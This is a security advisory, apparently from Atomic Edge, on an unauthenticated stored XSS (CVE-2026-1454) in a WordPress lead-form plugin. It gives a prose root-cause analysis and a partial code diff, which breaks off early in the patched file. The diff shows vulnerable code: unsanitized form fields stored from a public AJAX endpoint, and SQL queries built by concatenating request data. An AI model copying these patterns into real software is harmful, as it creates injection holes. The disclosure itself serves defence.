Atomic Edge analysis of CVE-2026-1454:
The vulnerability exists in the Responsive Contact Form Builder & Lead Generation Plugin for WordPress versions up to and including 2.0.1. The root cause is insufficient input sanitization in the lfb_lead_sanitize() function combined with overly permissive output filtering via wp_kses(). The lfb_lead_sanitize() function uses a whitelist approach that only sanitizes specific field types (name, text, radio, option, email, number, message, textarea, date, dob, url, checkbox). Field types not matching these patterns bypass sanitization entirely. The vulnerability manifests in the lfb_Save_Form_Data() function which processes form submissions via the Save_Form_Data AJAX action. Attackers can submit malicious payloads through unlisted field types that persist in the database. The stored XSS triggers when administrators view lead entries in the WordPress dashboard. The plugin renders lead data using wp_kses() with the expanded_alowed_tags() method from the LFB_Show_Leads class. This method permits onclick attributes on anchor tags, enabling JavaScript execution. The patch adds comprehensive sanitization for all field types by removing the restrictive whitelist. It introduces a new lfb_lead_sanitize_all() function that applies sanitize_text_field() to any value not explicitly handled by existing type-specific sanitizers. The patch also removes the onclick attribute from the expanded_alowed_tags() output filter. Exploitation requires unauthenticated access to the frontend form submission endpoint. Attackers inject malicious JavaScript via form fields that bypass the original sanitization logic. The payload executes in the administrator’s context when viewing leads, potentially leading to site takeover.
Published : March 18, 2026
CVE-2026-1454: Responsive Contact Form Builder & Lead Generation Plugin <= 2.0.1 – Unauthenticated Stored Cross-Site Scripting (lead-form-builder)
CVE ID
CVE-2026-1454
Plugin
lead-form-builder
Severity
High
(CVSS 7.2)
CWE
79
Vulnerable Version
2.0.1
Patched Version
2.0.3
Disclosed
March 9, 2026
Analysis Overview
Differential between vulnerable and patched code
Code Diff
--- a/lead-form-builder/inc/ajax-functions.php
+++ b/lead-form-builder/inc/ajax-functions.php
@@ -1,742 +1,767 @@
-<?php
-if (!defined('ABSPATH')) exit; // Exit if accessed directly
-
-
-
-/*
- * Save Lead collecting method
- */
-function lfb_save_lead_settings()
-{
- $nonce = $_REQUEST['lrv_nonce_verify'];
- // Get all the user roles as an array.
- if (isset($_POST['action-lead-setting']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'lrv-nonce')) {
-
- $data_recieve_method = intval($_POST['data-recieve-method']);
- $this_form_id = intval($_POST['action-lead-setting']);
- global $wpdb;
- $table_name = LFB_FORM_FIELD_TBL;
- $update_query = "update " . LFB_FORM_FIELD_TBL . " set storeType='" . $data_recieve_method . "' where id='" . $this_form_id . "'";
- $th_save_db = new LFB_SAVE_DB($wpdb);
- $update_leads = $th_save_db->lfb_update_form_data($update_query);
- if ($update_leads) {
- esc_html_e('updated', 'lead-form-builder');
- }
-
- die();
-
-}
-}
-
-add_action('wp_ajax_SaveLeadSettings', 'lfb_save_lead_settings');
-
-/*
- * Save Email Settings
- */
-
-function lfb_save_email_settings()
-{
-
- $nonce = $_REQUEST['aes_nonce'];
- // Get all the user roles as an array.
- if (isset($_POST['email_setting']['form-id']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'aes-nonce')) {
-
- global $wpdb;
- $email_setting = array();
- $this_form_id = intval($_POST['email_setting']['form-id']);
- $email_setting['email_setting'] = isset($_POST['email_setting']) ? $_POST['email_setting'] : '';
- $serialize = maybe_serialize($email_setting);
- $table_name = LFB_FORM_FIELD_TBL;
- $update_query = "update " . LFB_FORM_FIELD_TBL . " set mail_setting='" . $serialize . "' where id='" . $this_form_id . "'";
- $th_save_db = new LFB_SAVE_DB($wpdb);
- $update_leads = $th_save_db->lfb_update_form_data($update_query);
- if ($update_leads) {
- esc_html_e('updated', 'lead-form-builder');
- }
- die();
- }
-}
-
-add_action('wp_ajax_SaveEmailSettings', 'lfb_save_email_settings');
-
-/*
- * Save captcha Keys
- */
-
-function lfb_save_captcha_settings()
-{
- $nonce = $_POST['captcha_nonce'];
-
- if (isset($_POST['captcha-keys']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'captcha-nonce')) {
-
- $captcha_setting_sitekey = sanitize_text_field($_POST['captcha-setting-sitekey']);
- $captcha_setting_secret = sanitize_text_field($_POST['captcha-setting-secret']);
-
- if (get_option('captcha-setting-sitekey') !== false) {
- update_option('captcha-setting-sitekey', $captcha_setting_sitekey);
- update_option('captcha-setting-secret', $captcha_setting_secret);
- } else {
- add_option('captcha-setting-sitekey', $captcha_setting_sitekey);
- add_option('captcha-setting-secret', $captcha_setting_secret);
- }
-}
- die();
-}
-
-add_action('wp_ajax_SaveCaptchaSettings', 'lfb_save_captcha_settings');
-
-/*
- * Delete Leads From Back-end
- */
-function lfb_delete_leads_backend()
-{
-
- $nonce = $_REQUEST['_lfbnonce'];
- // Get all the user roles as an array.
-
- $check = false;
- if (isset($_POST['lead_id']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'lfb-nonce-rm')) {
- $check = true;
-
- $this_lead_id = intval($_POST['lead_id']);
- global $wpdb;
- $table_name = LFB_FORM_DATA_TBL;
-
- $update_query = $wpdb->prepare(" DELETE FROM $table_name WHERE id = %d ", $this_lead_id);
-
- $th_save_db = new LFB_SAVE_DB($wpdb);
- $update_leads = $th_save_db->lfb_delete_form($update_query);
- echo esc_html($update_leads);
- }
-
- echo $check;
-}
-
-add_action('wp_ajax_delete_leads_backend', 'lfb_delete_leads_backend');
-
-/*
- * Save captcha status for form ON/OFF
- */
-
-function lfb_save_captcha_option()
-{
- $nonce = $_POST['captcha_nonce'];
-if (isset($_POST['captcha_on_off_form_id']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'captcha-nonce')) {
-
- $captcha_option = sanitize_text_field($_POST['captcha-on-off-setting']);
- $this_form_id = intval($_POST['captcha_on_off_form_id']);
- global $wpdb;
- $table_name = LFB_FORM_FIELD_TBL;
- $update_query = "update " . LFB_FORM_FIELD_TBL . " set captcha_status='" . $captcha_option . "' where id='" . $this_form_id . "'";
- $th_save_db = new LFB_SAVE_DB($wpdb);
- $update_leads = $th_save_db->lfb_update_form_data($update_query);
- if ($update_leads) {
- esc_html_e('updated', 'lead-form-builder');
- }
-}
- die();
-}
-
-add_action('wp_ajax_SaveCaptchaOption', 'lfb_save_captcha_option');
-
-/*
- * Show all Leads column on Lead Page Based on form selection
- */
-
-function lfb_ShowAllLeadThisForm()
-{
- if ((isset($_POST['form_id']) && ($_POST['form_id'] != '')) || (isset($_GET['form_id']) && ($_GET['form_id'] != ''))) {
-
- global $wpdb;
- $table_name = LFB_FORM_DATA_TBL;
- $th_save_db = new LFB_SAVE_DB($wpdb);
- $nonce = wp_create_nonce('lfb-nonce-rm');
- $showLeadsObj = new LFB_Show_Leads();
- $start = 0;
- $limit = 10;
- $detail_view = '';
- $slectleads = false;
-
- if (isset($_GET['id'])) {
- $id = intval($_GET['id']);
- $start = ($id - 1) * $limit;
- $form_id = intval($_GET['form_id']);
- $sn_counter = $start;
- } else {
- $id = 1;
- $form_id = intval($_POST['form_id']);
- $sn_counter = 0;
- }
- if (isset($_GET['detailview'])) {
- $detail_view = sanitize_text_field($_GET['detailview']);
- }
-
- if (isset($_POST['slectleads'])) {
- $slectleads = sanitize_text_field($_POST['slectleads']);
- }
-
- $getArray = $th_save_db->lfb_get_all_view_leads_db($form_id, $start);
- $posts = $getArray['posts'];
- $rows = $getArray['rows'];
- $limit = $getArray['limit'];
- $fieldData = $getArray['fieldId'];
- $tableHead = '';
- $headcount = 1;
- $leadscount = 5;
-
- foreach ($fieldData as $fieldkey => $fieldvalue) {
- // Html Field removed
- $pos = strpos($fieldkey, 'htmlfield_');
- if ($pos !== false) {
- continue;
- }
-
- if ($headcount < 6 && $slectleads) {
- $tableHead .= '<th>' . $fieldvalue . '</th>';
- } elseif (!$slectleads) {
-
- $tableHead .= '<th>' . $fieldvalue . '</th>';
-
- $leadscount = $headcount;
- }
- $fieldIdNew[] = $fieldkey;
- $headcount++;
-
- // } else{ break; }
- }
-
- if (!empty($posts)) {
- $entry_counter = 0;
- $table_body = '';
- $table_head = '';
- $popupTab = '';
-
- if ($headcount >= 6 && $leadscount == 5) {
- $table_head .= '<th></th><th> . . . </th><th><input type="button" onclick="show_all_leads(' . intval($id) . ',' . intval($form_id) . ')" value="Show all Columns"></th>';
- }
-
- foreach ($posts as $results) {
- $table_row = '';
- // $table_head = '';
- $sn_counter++;
- $row_size_limit = 0;
- $form_data = $results->form_data;
- $lead_id = $results->id;
- $lead_date = date("jS F Y", strtotime($results->date));
- $form_data = maybe_unserialize($form_data);
- unset($form_data['hidden_field']);
- unset($form_data['action']);
- $entry_counter++;
- $complete_data = '';
- $popup_data_val = '';
- $date_td = '<td><b>' . $lead_date . '</b></td>';
-
-
- $returnData = $th_save_db->lfb_lead_form_value($form_data, $fieldIdNew, $fieldData, $leadscount);
- $table_row .= $returnData['table_row'];
- $table_row .= $date_td;
-
- foreach ($form_data as $form_data_key => $form_data_value) {
- $row_size_limit++;
-
- if (($detail_view != 1) && ($row_size_limit == 6) && $leadscount == 5) {
- $table_row .= '<td>. . .</td><td><a href="#lf-openModal-' . $lead_id . '" value="view">view</a></td>';
- }
- }
-
- $complete_data .= "<table><tr><th>Field</th><th>Value</th></tr>" . $returnData['table_popup'] . "</table>";
-
- /****/
- $popupTab .= '<div id="lf-openModal-' . $lead_id . '" class="lf-modalDialog">
- <div class="lfb-popup-leads" ><a href="#lf-close" title="Close" class="lf-close">X</a>' . $complete_data . '
- </div>
- </div>';
-
- // $complete_data .=$returnData['table_popup']."</table>";
-
- $table_body .= '<tbody id="lead-id-' . $lead_id . '">';
-
- $table_body .= '<tr><td><span class="lead-count">' . $sn_counter . '</span><a class="lead-remove" onclick="delete_this_lead(' . $lead_id . ','' . $nonce . '')" ><i class="fa fa-trash" aria-hidden="true"></i></a></td>' . $table_row . '</tr>';
- }
-
- $thHead = '<div class="wrap" id="form-leads-show"><table class="show-leads-table wp-list-table widefat fixed" id="show-leads-table" ><thead><tr><th>Action</th>' . $tableHead . '<th>Date</th>' . $table_head . '</tr></thead>';
-
- echo wp_kses($thHead . $table_body . '</tbody></table>' . $popupTab, $showLeadsObj->expanded_alowed_tags());
-
- $total = ceil($rows / $limit);
- if ($headcount >= 6 && $leadscount == 5) {
-
- if ($id > 1) {
- echo "<a href='' onclick='lead_pagi_view(" . intval($id - 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-right'></i></a>";
- }
- if ($id != $total) {
- echo "<a href='' onclick='lead_pagi_view(" . intval($id + 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-left'></i></a>";
- }
- echo "<ul class='page'>";
- for ($i = 1; $i <= $total; $i++) {
- if ($i == $id) {
- echo "<li class='lf-current'><a href='#'>" . intval($i) . "</a></li>";
- } else {
- echo "<li><a href='' onclick='lead_pagi_view(" . intval($i) . "," . intval($form_id) . ")'>" . intval($i) . "</a></li>";
- }
- }
- echo '</ul>';
- } else {
-
- if ($id > 1) {
- echo "<a href='' onclick='lead_pagination(" . intval($id - 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-right'></i></a>";
- }
- if ($id != $total) {
- echo "<a href='' onclick='lead_pagination(" . intval($id + 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-left'></i></a>";
- }
- echo "<ul class='page'>";
- for ($i = 1; $i <= $total; $i++) {
- if ($i == $id) {
- echo "<li class='lf-current'><a href='#'>" . intval($i) . "</a></li>";
- } else {
- echo "<li><a href='' onclick='lead_pagination(" . intval($i) . "," . intval($form_id) . ")'>" . intval($i) . "</a></li>";
- }
- }
- echo '</ul>';
- }
- } else {
- esc_html_e('Opps No lead...!!', 'lead-form-builder');
- }
- die();
- }
-}
-
-add_action('wp_ajax_ShowAllLeadThisForm', 'lfb_ShowAllLeadThisForm');
-
-
-
-function lfb_ShowLeadPagi()
-{
- if ((isset($_POST['form_id']) && ($_POST['form_id'] != '')) || (isset($_GET['form_id']) && ($_GET['form_id'] != ''))) {
- global $wpdb;
- $table_name = LFB_FORM_DATA_TBL;
- $th_save_db = new LFB_SAVE_DB($wpdb);
- $showLeadsObj = new LFB_Show_Leads();
- $nonce = wp_create_nonce('lfb-nonce-rm');
- $start = 0;
- $limit = 10;
- $detail_view = '';
-
- if (isset($_GET['id'])) {
- $id = intval($_GET['id']);
- $start = ($id - 1) * $limit;
- $form_id = intval($_GET['form_id']);
- $sn_counter = $start;
- } else {
- $id = 1;
- $form_id = intval($_POST['form_id']);
- $sn_counter = 0;
- }
- if (isset($_GET['detailview'])) {
- $detail_view = isset($_GET['detailview']);
- }
-
- $getArray = $th_save_db->lfb_get_all_view_leads_db($form_id, $start);
- $posts = $getArray['posts'];
- $rows = $getArray['rows'];
- $limit = $getArray['limit'];
- $fieldData = $getArray['fieldId'];
- $tableHead = '';
- $headcount = 1;
-
- foreach ($fieldData as $fieldkey => $fieldvalue) {
- if ($headcount < 6) {
- $tableHead .= '<th>' . $fieldvalue . '</th>';
- }
- $fieldIdNew[] = $fieldkey;
- // } else{ break; }
- $headcount++;
- }
- if (!empty($posts)) {
- $entry_counter = 0;
- $table_body = '';
- $table_head = '';
- $popupTab = '';
-
- if ($headcount >= 6) {
- $table_head .= '<th> . . . </th><th><input type="button" onclick="show_all_leads(' . $id . ',' . $form_id . ')" value="Show all Columns"></th>';
- }
-
- foreach ($posts as $results) {
- $table_row = '';
- $sn_counter++;
- $row_size_limit = 0;
- $form_data = $results->form_data;
- $lead_id = $results->id;
- $form_data = maybe_unserialize($form_data);
- unset($form_data['hidden_field']);
- unset($form_data['action']);
- $entry_counter++;
- $complete_data = '';
- $popup_data_val = '';
-
- $returnData = $th_save_db->lfb_lead_form_value($form_data, $fieldIdNew, $fieldData, 5);
- $table_row .= $returnData['table_row'];
-
- foreach ($form_data as $form_data_key => $form_data_value) {
- $row_size_limit++;
-
- if (($detail_view != 1) && ($row_size_limit == 6)) {
- $table_row .= '<td>. . .</td><td><a href="#lf-openModal-' . $lead_id . '" value="view">view</a></td>';
- }
- }
-
- $complete_data .= "<table><tr><th>Field</th><th>Value</th></tr>" . $returnData['table_popup'] . "</table>";
-
- /****/
- $popupTab .= '<div id="lf-openModal-' . $lead_id . '" class="lf-modalDialog">
- <div class="lfb-popup-leads" ><a href="#lf-close" title="Close" class="lf-close">X</a>' . $complete_data . '
- </div>
- </div>';
- /****/
- $table_body .= '<tbody id="lead-id-' . $lead_id . '">';
-
- $table_body .= '<tr><td><span class="lead-count">' . $sn_counter . '</span><a class="lead-remove" onclick="delete_this_lead(' . $lead_id . ','' . $nonce . '')" ><i class="fa fa-trash" aria-hidden="true"></i></a></td>' . $table_row . '</tr>';
- }
-
- $thHead = '<div class="wrap" id="form-leads-show"><table class="show-leads-table wp-list-table widefat fixed" id="show-leads-table" ><thead><tr><th>Action</th>' . $tableHead . $table_head . '</tr></thead>';
-
- echo wp_kses($thHead . $table_body . '</tbody></table>' . $popupTab, $showLeadsObj->expanded_alowed_tags());
-
- $total = ceil($rows / $limit);
- if ($id > 1) {
- echo "<a href='' onclick='lead_pagi_view(" . intval($id - 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-right'></i></a>";
- }
- if ($id != $total) {
- echo "<a href='' onclick='lead_pagi_view(" . intval($id + 1) . "," . intval($form_id) . ")' class='button'><i class='fa fa-chevron-left'></i></a>";
- }
- echo "<ul class='page'>";
- for ($i = 1; $i <= $total; $i++) {
- if ($i == $id) {
- echo "<li class='lf-current'><a href='#'>" . intval($i) . "</a></li>";
- } else {
- echo "<li><a href='' onclick='lead_pagi_view(" . intval($i) . "," . intval($form_id) . ")'>" . intval($i) . "</a></li>";
- }
- }
- echo '</ul>';
- } else {
- esc_html_e('Opps No lead...!!', 'lead-form-builder');
- }
- die();
- }
-}
-add_action('wp_ajax_ShowLeadPagi', 'lfb_ShowLeadPagi');
-
-/*
- * Show Leads on Lead Page Based on form selection
- */
-
-function lfb_ShowAllLeadThisFormDate()
-{
- if ((isset($_POST['form_id']) && ($_POST['form_id'] != '')) || (isset($_GET['form_id']) && ($_GET['form_id'] != ''))) {
- global $wpdb;
- $nonce = wp_create_nonce('lfb-nonce-rm');
- $table_name = LFB_FORM_DATA_TBL;
- $th_save_db = new LFB_SAVE_DB($wpdb);
- $showLeadsObj = new LFB_Show_Leads();
- $start = 0;
- $limit = 10;
- $detail_view = '';
-
- if (isset($_GET['id'])) {
- $id = intval($_GET['id']);
- $datewise = sanitize_text_field($_GET['datewise']);
- $start = ($id - 1) * $limit;
- $form_id = intval($_GET['form_id']);
- $sn_counter = $start;
- } else {
- $id = 1;
- $datewise = '';
- $sn_counter = 0;
- }
- if (isset($_GET['detailview'])) {
- $detail_view = sanitize_text_field($_GET['detailview']);
- }
- $getArray = $th_save_db->lfb_get_all_view_date_leads_db($form_id, $datewise, $start);
-
- $posts = $getArray['posts'];
- $rows = $getArray['rows'];
- $limit = $getArray['limit'];
- $fieldData = $getArray['fieldId'];
- $fieldIdNew = array();
- $headcount = 1;
-
- $tableHead = '';
-
-
- foreach ($fieldData as $fieldkey => $fieldvalue) {
- if ($headcount < 6) {
- $tableHead .= '<th>' . $fieldvalue . '</th>';
- }
- $fieldIdNew[] = $fieldkey;
- // } else{ break; }
- $headcount++;
- }
-
- if (!empty($posts)) {
- $entry_counter = 0;
- $value1 = 0;
- $table_body = '';
- $table_head = '';
- $popupTab = '';
-
-
- if ($headcount >= 6) {
- $table_head .= '<th><input type="button" onclick="show_all_leads(' . $id . ',' . $form_id . ')" value="Show all fields"></th>';
- }
-
- foreach ($posts as $results) {
- $table_row = '';
- $sn_counter++;
- $row_size_limit = 0;
- $form_data = $results->form_data;
- $lead_id = $results->id;
- $form_data = maybe_unserialize($form_data);
- unset($form_data['hidden_field']);
- unset($form_data['action']);
- $entry_counter++;
- $complete_data = '';
- $popup_data_val = '';
-
- $returnData = $th_save_db->lfb_lead_form_value($form_data, $fieldIdNew, $fieldData, 5);
- $table_row .= $returnData['table_row'];
-
-
-
- foreach ($form_data as $form_data_key => $form_data_value) {
- $row_size_limit++;
-
- if (($detail_view != 1) && ($row_size_limit == 6)) {
- $table_row .= '<td>. . . . .</td><td><a href="#lf-openModal-' . $lead_id . '" value="view">view</a></td>';
- }
- }
-
- $complete_data .= "<table><tr><th>Field</th><th>Value</th></tr>" . $returnData['table_popup'] . "</table>";
-
- /****/
- $popupTab .= '<div id="lf-openModal-' . $lead_id . '" class="lf-modalDialog">
- <div class="lfb-popup-leads" ><a href="#lf-close" title="Close" class="lf-close">X</a>' . $complete_data . '
- </div>
- </div>';
- /****/
- $table_body .= '<tbody id="lead-id-' . $lead_id . '">';
-
- $table_body .= '<tr><td><span class="lead-count">' . $sn_counter . '</span><a class="lead-remove" onclick="delete_this_lead(' . $lead_id . ','' . $nonce . '')" ><i class="fa fa-trash" aria-hidden="true"></i></a></td>' . $table_row . '</tr>';
- }
-
- $thHead = '<div class="wrap" id="form-leads-show"><table class="show-leads-table wp-list-table widefat fixed" id="show-leads-table" ><thead><tr><th>Action</th>' . $tableHead . $table_head . '</tr></thead>';
-
- echo wp_kses($thHead . $table_body . '</tbody></table>' . $popupTab, $showLeadsObj->expanded_alowed_tags());
-
- $rows = count($rows);
- $total = ceil($rows / $limit);
- if ($id > 1) {
- echo "<a href='' onclick='lead_pagination_datewise(" . intval($id - 1) . "," . intval($form_id) . ","" . $datewise . "");' class='button'><i class='fa fa-chevron-right'></i></a>";
- }
- if ($id != $total) {
- echo "<a href='' onclick='lead_pagination_datewise(" . intval($id + 1) . "," . intval($form_id) . ","" . $datewise . "");' class='button'><i class='fa fa-chevron-left'></i></a>";
- }
- echo "<ul class='page'>";
- for ($i = 1; $i <= $total; $i++) {
- if ($i == $id) {
- echo "<li class='lf-current'><a>" . intval($i) . "</a></li>";
- } else {
- echo "<li><a href='' onclick='lead_pagination_datewise(" . intval($i) . "," . intval($form_id) . ","" . $datewise . "");'>" . intval($i) . "</a></li>";
- }
- }
- echo '</ul>';
- } else {
- esc_html_e('Opps No lead...!!', 'lead-form-builder');
- }
- die();
- }
-}
-add_action('wp_ajax_ShowAllLeadThisFormDate', 'lfb_ShowAllLeadThisFormDate');
-
-/*
- * Save from Data from front-end
- */
-
-function lfb_form_name_email_filter($form_data)
-{
- $name_email = array();
- $e = false;
- $n = false;
- foreach ($form_data as $key => $value) {
- $email = strpos($key, 'email_');
- $name = strpos($key, 'name_');
- if ($email !== false) {
- $name_email['email'] = $value;
- $e = true;
- } elseif ($name !== false) {
- $name_email['name'] = $value;
- $n = true;
- }
- if ($e === true && $n === true) {
- break;
- }
- }
- return $name_email;
-}
-
-function lfb_lead_sanitize($leads)
-{
- if (is_array($leads)) {
- foreach ($leads as $key => $value) {
- $rKey = preg_replace("/[^a-zA-Z]+/", "", $key);
- if ($rKey === 'name' || $rKey === 'text' || $rKey === 'radio' || $rKey === 'option') {
- $leads[$key] = sanitize_text_field($value);
- } elseif ($rKey === 'email') {
- $leads[$key] = sanitize_email($value);
- } elseif ($rKey === 'number') {
- $leads[$key] = intval($value);
- } elseif ($rKey === 'message' || $rKey === 'textarea') {
- $leads[$key] = sanitize_textarea_field($value);
- } elseif ($rKey === 'date' || $rKey === 'dob') {
- $leads[$key] = sanitize_text_field($value);
- } elseif ($rKey === 'url') {
- $leads[$key] = esc_url_raw($value);
- } elseif ($rKey === 'checkbox') {
-
- foreach ($value as $ckey => $cvalue) {
- $value[$ckey] = sanitize_text_field($cvalue);
- }
- $leads[$key] = $value;
- }
- } // end foreach
-
- return $leads;
- }
-}
-
-function lfb_Save_Form_Data()
-{
-
- if (isset($_POST['fdata']) && wp_verify_nonce($_POST['_wpnonce'], 'lfb_front_nonce' )) {
- wp_parse_str($_POST['fdata'], $fromData);
-
- $form_id = intval($fromData['hidden_field']);
- unset($fromData['g-recaptcha-response']);
- unset($fromData['action']);
- unset($fromData['hidden_field']);
-
- $en = lfb_form_name_email_filter($fromData);
-
-
- if ((isset($en['email'])) && ($en['email'] != '')) {
- $user_emailid = sanitize_email($en['email']);
- } else {
- $user_emailid = esc_html__('invalid_email', 'lead-form-builder');
- }
- $sanitize_leads = lfb_lead_sanitize($fromData);
- $form_data = maybe_serialize($sanitize_leads);
-
- $lf_store = new LFB_LeadStoreType();
- $th_save_db = new LFB_SAVE_DB();
-
- $lf_store->lfb_mail_type($form_id, $form_data, $th_save_db, $user_emailid);
- }else{
- echo esc_html__('INVAILD','lead-form-builder');
- }
- die();
-}
-
-add_action('wp_ajax_Save_Form_Data', 'lfb_Save_Form_Data');
-add_action('wp_ajax_nopriv_Save_Form_Data', 'lfb_Save_Form_Data');
-
-function lfb_verifyFormCaptcha()
-{
- if ((isset($_POST['captcha_res'])) && (!empty($_POST['captcha_res']))) {
- $captcha = stripslashes($_POST['captcha_res']);
- $secret_key = get_option('captcha-setting-secret');
- $response = wp_remote_post(
- 'https://www.google.com/recaptcha/api/siteverify',
- array(
- 'method' => 'POST',
- 'body' => array(
- 'secret' => $secret_key,
- 'response' => $captcha
- )
- )
- );
- $reply_obj = json_decode(wp_remote_retrieve_body($response));
- if (isset($reply_obj->success) && $reply_obj->success == 1) {
- esc_html_e('Yes', 'lead-form-builder');
- } else {
- esc_html_e('No', 'lead-form-builder');
- }
- } else {
- esc_html_e('Invalid', 'lead-form-builder');
- }
- die();
-}
-add_action('wp_ajax_verifyFormCaptcha', 'lfb_verifyFormCaptcha');
-add_action('wp_ajax_nopriv_verifyFormCaptcha', 'lfb_verifyFormCaptcha');
-
-function lfb_RememberMeThisForm()
-{
- $nonce = $_POST['rem_nonce'];
-
- if (isset($_POST['form_id']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'rem-nonce')) {
-
- $remember_me = intval($_POST['form_id']);
- if (get_option('lf-remember-me-show-lead') !== false) {
- update_option('lf-remember-me-show-lead', $remember_me);
- } else {
- add_option('lf-remember-me-show-lead', $remember_me);
- }
- echo esc_html(get_option('lf-remember-me-show-lead'));
- die();
- }
-}
-add_action('wp_ajax_RememberMeThisForm', 'lfb_RememberMeThisForm');
-
-
-/*
- * Save Email Settings
- */
-
-
-
-function lfb_emailsettings_sanitize($email_settings)
-{
-
- $email_settings['from'] = sanitize_email($email_settings['from']);
- $email_settings['header'] = sanitize_text_field($email_settings['header']);
- $email_settings['subject'] = sanitize_text_field($email_settings['subject']);
- $email_settings['message'] = sanitize_textarea_field($email_settings['message']);
- $email_settings['user-email-setting-option'] = sanitize_text_field($email_settings['user-email-setting-option']);
- $email_settings['form-id'] = intval($email_settings['form-id']);
- return $email_settings;
-}
-
-function lfb_SaveUserEmailSettings()
-{
- unset($_POST['action']);
- $mailArr = array();
-
- $nonce = $_REQUEST['ues_nonce'];
- // Get all the user roles as an array.
- if (isset($_POST['user_email_setting']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'ues-nonce')) {
-
- $mailArr['user_email_setting'] = lfb_emailsettings_sanitize($_POST['user_email_setting']);
-
- $email_setting = maybe_serialize($mailArr);
- $this_form_id = intval($_POST['user_email_setting']['form-id']);
- global $wpdb;
- $table_name = LFB_FORM_FIELD_TBL;
- $update_query = "update " . LFB_FORM_FIELD_TBL . " set usermail_setting='" . $email_setting . "' where id='" . $this_form_id . "'";
- $th_save_db = new LFB_SAVE_DB($wpdb);
- $update_leads = $th_save_db->lfb_update_form_data($update_query);
- if ($update_leads) {
- echo esc_html("updated");
- }
- }
- die();
-}
-add_action('wp_ajax_SaveUserEmailSettings', 'lfb_SaveUserEmailSettings');
+<?php
+if (!defined('ABSPATH')) exit; // Exit if accessed directly
+
+
+
+/*
+ * Save Lead collecting method
+ */
+function lfb_save_lead_settings()
+{
+ $nonce = $_REQUEST['lrv_nonce_verify'];
+ // Get all the user roles as an array.
+ if (isset($_POST['action-lead-setting']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'lrv-nonce')) {
+
+ $data_recieve_method = intval($_POST['data-recieve-method']);
+ $this_form_id = intval($_POST['action-lead-setting']);
+ global $wpdb;
+ $table_name = LFB_FORM_FIELD_TBL;
+ $update_query = "update " . LFB_FORM_FIELD_TBL . " set storeType='" . $data_recieve_method . "' where id='" . $this_form_id . "'";
+ $th_save_db = new LFB_SAVE_DB($wpdb);
+ $update_leads = $th_save_db->lfb_update_form_data($update_query);
+ if ($update_leads) {
+ esc_html_e('updated', 'lead-form-builder');
+ }
+
+ die();
+
+}
+}
+
+add_action('wp_ajax_SaveLeadSettings', 'lfb_save_lead_settings');
+
+/*
+ * Save Email Settings
+ */
+
+function lfb_save_email_settings()
+{
+
+ $nonce = $_REQUEST['aes_nonce'];
+ // Get all the user roles as an array.
+ if (isset($_POST['email_setting']['form-id']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'aes-nonce')) {
+
+ global $wpdb;
+ $email_setting = array();
+ $this_form_id = intval($_POST['email_setting']['form-id']);
+ $email_setting['email_setting'] = isset($_POST['email_setting']) ? $_POST['email_setting'] : '';
+ $serialize = maybe_serialize($email_setting);
+ $table_name = LFB_FORM_FIELD_TBL;
+ $update_query = "update " . LFB_FORM_FIELD_TBL . " set mail_setting='" . $serialize . "' where id='" . $this_form_id . "'";
+ $th_save_db = new LFB_SAVE_DB($wpdb);
+ $update_leads = $th_save_db->lfb_update_form_data($update_query);
+ if ($update_leads) {
+ esc_html_e('updated', 'lead-form-builder');
+ }
+ die();
+ }
+}
+
+add_action('wp_ajax_SaveEmailSettings', 'lfb_save_email_settings');
+
+/*
+ * Save captcha Keys
+ */
+
+function lfb_save_captcha_settings()
+{
+ $nonce = $_POST['captcha_nonce'];
+
+ if (isset($_POST['captcha-keys']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'captcha-nonce')) {
+
+ $captcha_setting_sitekey = sanitize_text_field($_POST['captcha-setting-sitekey']);
+ $captcha_setting_secret = sanitize_text_field($_POST['captcha-setting-secret']);
+
+ if (get_option('captcha-setting-sitekey') !== false) {
+ update_option('captcha-setting-sitekey', $captcha_setting_sitekey);
+ update_option('captcha-setting-secret', $captcha_setting_secret);
+ } else {
+ add_option('captcha-setting-sitekey', $captcha_setting_sitekey);
+ add_option('captcha-setting-secret', $captcha_setting_secret);
+ }
+}
+ die();
+}
+
+add_action('wp_ajax_SaveCaptchaSettings', 'lfb_save_captcha_settings');
+
+/*
+ * Delete Leads From Back-end
+ */
+function lfb_delete_leads_backend()
+{
+
+ $nonce = $_REQUEST['_lfbnonce'];
+ // Get all the user roles as an array.
+
+ $check = false;
+ if (isset($_POST['lead_id']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'lfb-nonce-rm')) {
+ $check = true;
+
+ $this_lead_id = intval($_POST['lead_id']);
+ global $wpdb;
+ $table_name = LFB_FORM_DATA_TBL;
+
+ $update_query = $wpdb->prepare(" DELETE FROM $table_name WHERE id = %d ", $this_lead_id);
+
+ $th_save_db = new LFB_SAVE_DB($wpdb);
+ $update_leads = $th_save_db->lfb_delete_form($update_query);
+ echo esc_html($update_leads);
+ }
+
+ echo $check;
+}
+
+add_action('wp_ajax_delete_leads_backend', 'lfb_delete_leads_backend');
+
+/*
+ * Save captcha status for form ON/OFF
+ */
+
+function lfb_save_captcha_option()
+{
+ $nonce = $_POST['captcha_nonce'];
+if (isset($_POST['captcha_on_off_form_id']) && current_user_can('manage_options') && wp_verify_nonce($nonce, 'captcha-nonce')) {
+
+ $captcha_option = sanitize_text_field($_POST['captcha-on-off-setting']);
+ $this_form_id = intval($_POST['captcha_on_off_form_id']);
+ global $wpdb;
+ $table_name = LFB_FORM_FIELD_TBL;
+ $update_query = "update " . LFB_FORM_FIELD_TBL . " set captcha_status='" . $captcha_option . "' where id='" . $this_form_id . "'";
+ $th_save_db = new LFB_SAVE_DB($wpdb);
+ $update_leads = $th_save_db->lfb_update_form_data($update_query);
+ if ($update_leads) {
+ esc_html_e('updated', 'lead-form-builder');
+ }
+}
+ die();
+}
+
+add_action('wp_ajax_SaveCaptchaOption', 'lfb_save_captcha_option');
+
+/*
